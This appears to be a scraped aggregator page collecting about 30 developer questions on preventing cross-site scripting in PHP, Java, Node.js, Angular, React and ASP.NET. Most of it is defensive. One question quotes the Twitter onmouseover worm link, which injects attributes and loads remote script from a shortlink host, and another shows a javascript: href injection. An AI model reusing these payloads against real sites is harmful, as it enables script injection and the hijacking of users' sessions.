Is there a catchall function somewhere that works well for sanitizing user input for SQL injection and XSS attacks, while still allowing certain types of HTML tags?

How can I sanitize user input with PHP?

How do I prevent XSS (cross-site scripting) using just HTML and PHP?

I&#39;ve seen numerous other posts on this topic but I have not found an article that clear and concisely states how to actually prevent XSS.

How to prevent XSS with HTML/PHP?

So I&#39;ve been toying around with HTTP for fun in telnet now (i.e. just typing in `telnet google.com 80` and putting in random GETs and POSTs with different headers and the like) but I&#39;ve come across something that google.com transmits in it&#39;s headers that I don&#39;t know.

I&#39;ve been looking through http://www.w3.org/Protocols/rfc2616/rfc2616.html and have found no definition for this particular http-header that google seems to be spouting out:


    GET / HTTP/1.1
    
    HTTP/1.1 200 OK
    Date: Wed, 01 Feb 2012 03:42:24 GMT
    Expires: -1
    Cache-Control: private, max-age=0
    Content-Type: text/html; charset=ISO-8859-1
    Set-Cookie: PREF=ID=6ddbc0a0342e7e63:FF=0:TM=1328067744:LM=1328067744:S=4d4farvCGl5Ww0C3; expires=Fri, 31-Jan-2014 03:42:24 GMT; path=/; domain=.google.com
    Set-Cookie: NID=56=PgRwCKa8EltKnHS5clbFuhwyWsd3cPXiV1-iXzgyKsiy5RKXEKbg89gWWpjzYZjLPWTKrCWhOUhdInOlYU56LOb2W7XpC7uBnKAjMbxQSBw1UIprzw2BFK5dnaY7PRji; expires=Thu, 02-Aug-2012 03:42:24 GMT; path=/; domain=.google.com; HttpOnly
    P3P: CP=&quot;This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&amp;answer=151657 for more info.&quot;
    Server: gws
    X-XSS-Protection: 1; mode=block
    X-Frame-Options: SAMEORIGIN
    Transfer-Encoding: chunked
    
    1000

Anyone know what `X-XSS-Protection` is?




What is the http-header &quot;X-XSS-Protection&quot;?

I read this on the React tutorial. What does this mean? 

&gt; React is safe. We are not generating HTML strings so XSS protection is the default.

How do XSS attacks work if React is safe? How is this safety achieved?

What does it mean when they say React is XSS protected?

I want to set the background image of a DIV in a Component Template in my Angular 2 app. However I keep getting the following warning in my console and I don&#39;t get the desired effect... I am unsure if the dynamic CSS background image is being blocked due to security restrictions in Angular2 or if my HTML template is broken.

This is the warning I see in my console (I have changed my img url to `/img/path/is/correct.png `:

&gt; WARNING: sanitizing unsafe style value url(SafeValue must use [property]=binding: /img/path/is/correct.png (see http://g.co/ng/security#xss)) (see http://g.co/ng/security#xss).

The thing is I do sanitize what is injected into my template using the `DomSanitizationService` in Angular2. Here is my HTML that I have in my template:

    &lt;div&gt;
        &lt;div&gt;
            &lt;div class=&quot;header&quot;
                 *ngIf=&quot;image&quot;
                 [style.background-image]=&quot;&#39;url(&#39; + image + &#39;)&#39;&quot;&gt;
            &lt;/div&gt;
    
            &lt;div class=&quot;zone&quot;&gt;
                &lt;div&gt;
                    &lt;div&gt;
                        &lt;h1 [innerHTML]=&quot;header&quot;&gt;&lt;/h1&gt;
                    &lt;/div&gt;
                    &lt;div class=&quot;zone__content&quot;&gt;
                        &lt;p
                           *ngFor=&quot;let contentSegment of content&quot;
                           [innerHTML]=&quot;contentSegment&quot;&gt;&lt;/p&gt;
                    &lt;/div&gt;
                &lt;/div&gt;
            &lt;/div&gt;
        &lt;/div&gt;
    &lt;/div&gt;

Here is the component...

    Import {
        DomSanitizationService,
        SafeHtml,
        SafeUrl,
        SafeStyle
    } from &#39;@angular/platform-browser&#39;;
    
    @Component({
                   selector: &#39;example&#39;,
                   templateUrl: &#39;src/content/example.component.html&#39;
               })
    export class CardComponent implements OnChanges {
    
        public header:SafeHtml;
        public content:SafeHtml[];
        public image:SafeStyle;
        public isActive:boolean;
        public isExtended:boolean;
    
        constructor(private sanitization:DomSanitizationService) {
        }
    
        ngOnChanges():void {
            map(this.element, this);
    
            function map(element:Card, instance:CardComponent):void {
                if (element) {
                    instance.header = instance.sanitization.bypassSecurityTrustHtml(element.header);
    
                    instance.content = _.map(instance.element.content, (input:string):SafeHtml =&gt; {
                        return instance.sanitization.bypassSecurityTrustHtml(input);
                    });
    
                    if (element.image) {
                        /* Here is the problem... I have also used bypassSecurityTrustUrl */ 
                        instance.image = instance.sanitization.bypassSecurityTrustStyle(element.image);
                    } else {
                        instance.image = null;
                    }
    
                }
            }
        }
    }

Please note that when I just bound to the template using [src]=&quot;image&quot;, for example: 

    &lt;div *ngIf=&quot;image&quot;&gt;
        &lt;img [src]=&quot;image&quot;&gt;
    &lt;/div&gt;

and `image` was passed using `bypassSecurityTrustUrl` everything seemed to work well... can anyone see what I am doing wrong?

WARNING: sanitizing unsafe style value url

I read the tutorial [DIY widgets - How to embed your site on another site](https://web.archive.org/web/20080720015427/http://drnicwilliams.com/2006/11/21/diy-widgets/) for XSS Widgets by Dr. Nic.  

I&#39;m looking for a way to pass parameters to the script tag. For example, to make the following work:


    &lt;script src=&quot;http://path/to/widget.js?param_a=1&amp;amp;param_b=3&quot;&gt;&lt;/script&gt;

Is there a way to do this?

___

Two interesting links:

  * https://stackoverflow.com/questions/2170439/how-to-embed-javascript-widget-that-depends-on-jquery-into-an-unknown-environment (Stackoverflow discussion)
  * [An article on passing parameters to a script tag](http://feather.elektrum.org/book/src.html)

How to pass parameters to a Script tag?

Earlier today a question was asked regarding [input validation strategies in web apps][1].

The top answer, at time of writing, suggests in `PHP` just using `htmlspecialchars` and `mysql_real_escape_string`. 

My question is: Is this always enough? Is there more we should know? Where do these functions break down?

  [1]: https://stackoverflow.com/questions/110458/what-percentage-of-my-time-will-be-spent-in-user-input-verfication-during-web-d

Do htmlspecialchars and mysql_real_escape_string keep my PHP code safe from injection?

How can I set the cookies in my `PHP apps` as `HttpOnly cookies`?

How do you set up use HttpOnly cookies in PHP

It seems like the point of [window.postMessage][1] is to allow safe communication between windows/frames hosted on different domains, but it doesn&#39;t actually seem to *allow* that in Chrome.

Here&#39;s the scenario:  

  1. Embed an &amp;lt;iframe&amp;gt; (with a `src` on domain B&lt;sup&gt;*&lt;/sup&gt;) in a page on domain A 
  2. The &amp;lt;iframe&amp;gt; ends up being mostly a &amp;lt;script&amp;gt; tag, at the end of which&#39;s execution...
  3.  I call window.postMessage( *some\_data*, *page\_on\_A* )

The &amp;lt;iframe&amp;gt; is most definitely in the context of domain B, and I&#39;ve confirmed that the embedded javascript in that &amp;lt;iframe&amp;gt; executes properly and calls `postMessage` with the correct values.

I get this error message in Chrome:  

&gt; Unable to post message to *A*.
&gt; Recipient has origin *B*.

Here&#39;s the code that registers a message event listener in the page on A:

    window.addEventListener(
      &quot;message&quot;,
      function (event) {
        // Do something
      },
      false);

I&#39;ve also tried calling `window.postMessage(some_data, &#39;*&#39;)`, but all that does is suppress the error.

Am I just missing the point here, is window.postMessage(...) not meant for this?  Or am I just doing it horribly wrong?

&lt;sub&gt;*Mime-type text/html, which it must remain.&lt;/sub&gt;

  [1]: https://developer.mozilla.org/en/DOM/window.postMessage

How do you use window.postMessage across domains?

How can I prevent XSS attacks in a JSP/Servlet web application?

XSS prevention in JSP/Servlet web application

After reading Jeff&#39;s blog post on [Protecting Your Cookies: HttpOnly][1]. I&#39;d like to implement HttpOnly cookies in my web application.

How do you tell tomcat to use http only cookies for sessions?


  [1]: http://www.codinghorror.com/blog/archives/001167.html

How do you configure HttpOnly cookies in tomcat / java webapps?

In the video below, at time marker 21:40, the Microsoft PDC presenter says it&#39;s important that all JSON be wrapped so it&#39;s not a top level array:

https://channel9.msdn.com/Events/PDC/PDC09/FT12

What is the risk of an unwrapped top level array?

How should I check and see if I&#39;m vulnerable?  I purchase many components from 3rd parties and have external vendors who develop my code.  

What are &quot;top level JSON arrays&quot; and why are they a security risk?

We have a high security application and we want to allow users to enter URLs that other users will see.

This introduces a high risk of XSS hacks - a user could potentially enter javascript that another user ends up executing. Since we hold sensitive data it&#39;s essential that this never happens.

What are the best practices in dealing with this? Is any security whitelist or escape pattern alone good enough? 

Any advice on dealing with redirections (&quot;this link goes outside our site&quot; message on a warning page before following the link, for instance)

Is there an argument for not supporting user entered links at all?


----------
Clarification:

Basically our users want to input: 

&gt; stackoverflow.com

And have it output to another user:

    &lt;a href=&quot;http://stackoverflow.com&quot;&gt;stackoverflow.com&lt;/a&gt;

What I really worry about is them using this in a XSS hack. I.e. they input:

&gt; alert(&#39;hacked!&#39;);

So other users get this link:

    &lt;a href=&quot;javascript:alert(&#39;hacked!&#39;);&quot;&gt;stackoverflow.com&lt;/a&gt;

My example is just to explain the risk - I&#39;m well aware that javascript and URLs are different things, but by letting them input the latter they may be able to execute the former.

You&#39;d be amazed how many sites you can break with this trick - HTML is even worse. If they know to deal with links do they also know to sanitise `&lt;iframe&gt;`, `&lt;img&gt;` and clever CSS references?

I&#39;m working in a high security environment - a single XSS hack could result in very high losses for us. I&#39;m happy that I could produce a Regex (or use one of the excellent suggestions so far) that could exclude everything that I could think of, but would that be enough?



Best way to handle security and avoid XSS with user entered URLs

Any idea how one would go about preventing XSS attacks on a node.js app? Any libs out there that handle removing javascript in hrefs, onclick attributes,etc. from POSTed data?

I don&#39;t want to have to write a regex for all that :)

Any suggestions?

Preventing XSS in Node.js / server side javascript

Given the following two HTML/PHP snippets:

    &lt;input type=&quot;text&quot; name=&quot;firstname&quot; value=&quot;&lt;?php echo $_POST[&#39;firstname&#39;]; ?&gt;&quot; /&gt;

and

    &lt;textarea name=&quot;content&quot;&gt;&lt;?php echo $_POST[&#39;content&#39;]; ?&gt;&lt;/textarea&gt;

what character encoding do I need to use for the echoed `$_POST` variables? Can I use any built-in PHP functions?

Please assume that the `$_POST` values have not been encoded at all yet. No magic quotes - no nothing.




How can I properly escape HTML form input default values in PHP?

I am not concerned about other kinds of attacks. Just want to know whether HTML Encode can prevent all kinds of XSS attacks.

Is there some way to do an XSS attack even if HTML Encode is used?

Will HTML Encoding prevent all kinds of XSS attacks?

I have PHP configured so that magic quotes are on and register globals are off.

I do my best to always call htmlentities() for anything I am outputing that is derived from user input.

I also occasionally seach my database for common things used in xss attached such as...

    &lt;script

What else should I be doing and how can I make sure that the things I am trying to do are **always** done.

What are the best practices for avoiding xss attacks in a PHP site

I have unescaped data from users. 

So is it safe to use like this:

    var data = &#39;&lt;test&gt;a&amp;f&quot;#&lt;/test&gt;&#39;; // example data from ajax response
    if (typeof(data) === &#39;string&#39;)
        $(&#39;body&#39;).text(data);

Can I use like this or there is some problems like encoding or some specific symbols that I should be careful and add more strict validation?

Is jQuery .text() method XSS safe?

User equals untrustworthy. Never trust untrustworthy user&#39;s input. I get that. However, I am wondering when the best time to sanitize input is. For example, do you blindly store user input and then sanitize it whenever it is accessed/used, or do you sanitize the input immediately and then store this &quot;cleaned&quot; version? Maybe there are also some other approaches I haven&#39;t though of in addition to these. I am leaning more towards the first method, because any data that came from user input must still be approached cautiously, where the &quot;cleaned&quot; data might still unknowingly or accidentally be dangerous. Either way, what method do people think is best, and for what reasons?

When is it best to sanitize user input?

I&#39;m writing the JS for a chat application I&#39;m working on in my free time, and I need to have HTML identifiers that change according to user submitted data. This is usually something conceptually shaky enough that I would not even attempt it, but I don&#39;t see myself having much of a choice this time. What I need to do then is to escape the HTML id to make sure it won&#39;t allow for XSS or breaking HTML.

Here&#39;s the code:

    var user_id = escape(id)
    var txt = &#39;&lt;div class=&quot;chut&quot;&gt;&#39;+
                &#39;&lt;div class=&quot;log&quot; id=&quot;chut_&#39;+user_id+&#39;&quot;&gt;&lt;/div&gt;&#39;+
                &#39;&lt;textarea id=&quot;chut_&#39;+user_id+&#39;_msg&quot;&gt;&lt;/textarea&gt;&#39;+
                &#39;&lt;label for=&quot;chut_&#39;+user_id+&#39;_to&quot;&gt;To:&lt;/label&gt;&#39;+
                &#39;&lt;input type=&quot;text&quot; id=&quot;chut_&#39;+user_id+&#39;_to&quot; value=&#39;+user_id+&#39; readonly=&quot;readonly&quot; /&gt;&#39;+
                &#39;&lt;input type=&quot;submit&quot; id=&quot;chut_&#39;+user_id+&#39;_send&quot; value=&quot;Message&quot;/&gt;&#39;+
              &#39;&lt;/div&gt;&#39;;

What would be the best way to escape `id` to avoid any kind of problem mentioned above? As you can see, right now I&#39;m using the built-in `escape()` function, but I&#39;m not sure of how good this is supposed to be compared to other alternatives. I&#39;m mostly used to sanitizing input before it goes in a text node, not an id itself.

Sanitizing user input before adding it to the DOM in Javascript

What is the best way to sanitize user input for a Python-based web application? Is there a single function to remove HTML characters and any other necessary characters combinations to prevent an [XSS][1] or SQL injection attack?


  [1]: http://en.wikipedia.org/wiki/Cross-site_scripting

Sanitising user input using Python

What should I do to prevent XSS in Spring MVC? Right now I am just putting all places where I output user text into JSTL `&lt;c:out&gt;` tags or `fn:escapeXml()` functions, but this seems error prone as I might miss a place.

Is there an easy systematic way to prevent this? Maybe like a filter or something? I&#39;m collecting input by specifying `@RequestParam` parameters on my controller methods. 

How do I prevent people from doing XSS in Spring MVC?

I have a lot of user inputs from `$_GET` and `$_POST`... At the moment I always write `mysql_real_escape_string($_GET[&#39;var&#39;])`..

I would like to know whether you could make a function that secures, escapes and cleans the `$_GET`/`$_POST` arrays right away, so you won&#39;t have to deal with it each time you are working with user inputs and such.

I was thinking of an function, e.g `cleanMe($input)`, and inside it, it should do `mysql_real_escape_string`, `htmlspecialchars`, `strip_tags`, `stripslashes` (I think that would be all to make it clean &amp; secure) and then return the `$input`.

So is this possible? Making a function that works for all `$_GET` and `$_POST`, so you would do only this:

    $_GET  = cleanMe($_GET);
    $_POST = cleanMe($_POST);

So in your code later, when you work with e.g `$_GET[&#39;blabla&#39;]` or `$_POST[&#39;haha&#39;]` , they are secured, stripped and so on?

Tried myself a little:

    function cleanMe($input) {
       $input = mysql_real_escape_string($input);
       $input = htmlspecialchars($input, ENT_IGNORE, &#39;utf-8&#39;);
       $input = strip_tags($input);
       $input = stripslashes($input);
       return $input;
    }




The ultimate clean/secure function

I have a web application built on JSF with MySQL as DB. I have already implemented the code to prevent CSRF in my application.

Now since my underlying framework is JSF, I guess I don&#39;t have to handle XSS attack as it is already handled by `UIComponent`. I am not using any JavaScript in any of the view pages. Even if I use do I really need to implement code to prevent XSS attacks?

For DB we are using prepared statements and stored procedures in all DB interactions.

Is there anything else needs to be handled for preventing these 3 common attacks?
I have already been through the [OWASP][1] site and their [cheat sheets][2].

Do I need to take care of any other potential attack vectors?
            


  [1]: http://www.owasp.org/
  [2]: https://www.owasp.org/index.php/Java_Server_Faces

CSRF, XSS and SQL Injection attack prevention in JSF

Is there a known XSS or other attack that makes it past a 

    $content = &quot;some HTML code&quot;;
    $content = strip_tags($content);
  
    echo $content;

?

The [manual][1] has a warning:

 &gt; This function does not modify any attributes on the tags that you allow using allowable_tags, including the style and onmouseover attributes that a mischievous user may abuse when posting text that will be shown to other users.

but that is related to using the `allowable_tags` parameter only.

 **With no allowed tags set**, is `strip_tags()` vulnerable to any attack?

[Chris Shiflett][2] seems to say it&#39;s safe:

&gt; Use Mature Solutions
&gt;
&gt;When possible, use mature, existing solutions instead of trying to create your own. Functions like strip_tags() and htmlentities() are good choices.

is this correct? Please if possible, quote sources.

I know about HTML purifier, htmlspecialchars() etc.- I am **not** looking for the best method to sanitize HTML. I just want to know about this specific issue. This is a theoretical question that came up [here][3].

Reference: [`strip_tags()` implementation in the PHP source code][4]


  [1]: http://php.net/strip_tags
  [2]: http://shiflett.org/articles/foiling-cross-site-attacks
  [3]: https://stackoverflow.com/questions/5788314
  [4]: http://lxr.php.net/opengrok/xref/PHP_5_3/ext/standard/string.c#php_strip_tags_ex

Is strip_tags() vulnerable to scripting attacks?

Is it possible to use cross site scripting in a CSS stylesheet? For example a reference stylesheet contains malicious code, how would you do this?
I know you can use style tags but what about stylesheets?

Cross Site Scripting in CSS Stylesheets

Can you explain what exactly happened on Twitter today? Basically the exploit was causing people to post a tweet containing this link:  

&lt;pre&gt;http://t.co/@&quot;style=&quot;font-size:999999999999px;&quot;onmouseover=&quot;$.getScript(&#39;http:\u002f\u002fis.gd\u002ffl9A7&#39;)&quot;/&lt;/pre&gt;

Is this technically an XSS attack or something else?

Here is how the Twitter home page looked like: http://www.flickr.com/photos/travelist/6832853140/


Today&#39;s XSS onmouseover exploit on twitter.com

I was trying to hit a web service on a different domain using jQuery&#39;s ajax method.  After doing some research it looks like it does not allow this is by design to prevent cross site scripting.  

I came across a work around which was to include this line:

    $.support.cors = true;

at the top of my javascript code.  From what I understand this enables cross site scripting in jQuery.

Does having this line of code make my site more vulnerable to attack?  I&#39;ve always heard XSS discussed as a security issue, are there legitimate uses for XSS?

Is it safe to use $.support.cors = true; in jQuery?

Inspired by this CodingHorror article, &quot;[Protecting Your Cookies: HttpOnly][1]&quot;

How do you set this property? Somewhere in the web config?


  [1]: http://www.codinghorror.com/blog/archives/001167.html

How exactly do you configure httpOnlyCookies in ASP.NET?

I just ran across a question with an answer suggesting the AntiXss library to avoid cross site scripting. Sounded interesting, reading the [msdn blog][1], it appears to just provide an HtmlEncode() method. But I already use HttpUtility.HtmlEncode().

**Why would I want to use AntiXss.HtmlEncode over HttpUtility.HtmlEncode?**

Indeed, I am not the first to ask this question. And, indeed, Google turns up [some][2] [answers][3], mainly

 * A white-list instead of black-list approach
 * A 0.1ms performance improvement

Well, that&#39;s nice, but what does it mean for me? I don&#39;t care so much about the performance of 0.1ms and I don&#39;t really feel like downloading and adding another library dependency for functionality that I already have.

**Are there examples of cases where the AntiXss implementation would prevent an attack that the HttpUtility implementation would not?**

If I continue to use the HttpUtility implementation, am I at risk? What about [this &#39;bug&#39;][4]?


  [1]: http://msdn.microsoft.com/en-us/library/aa973813.aspx
  [2]: http://blogs.msdn.com/dansellers/archive/2006/02/23/538187.aspx
  [3]: http://blogs.msdn.com/securitytools/archive/2009/07/09/differences-between-antixss-htmlencode-and-httputility-htmlencode-methods.aspx
  [4]: http://connect.microsoft.com/VisualStudio/feedback/ViewFeedback.aspx?FeedbackID=252514

All Xss Solutions on Gang of Coders

Total of 30 Xss Solutions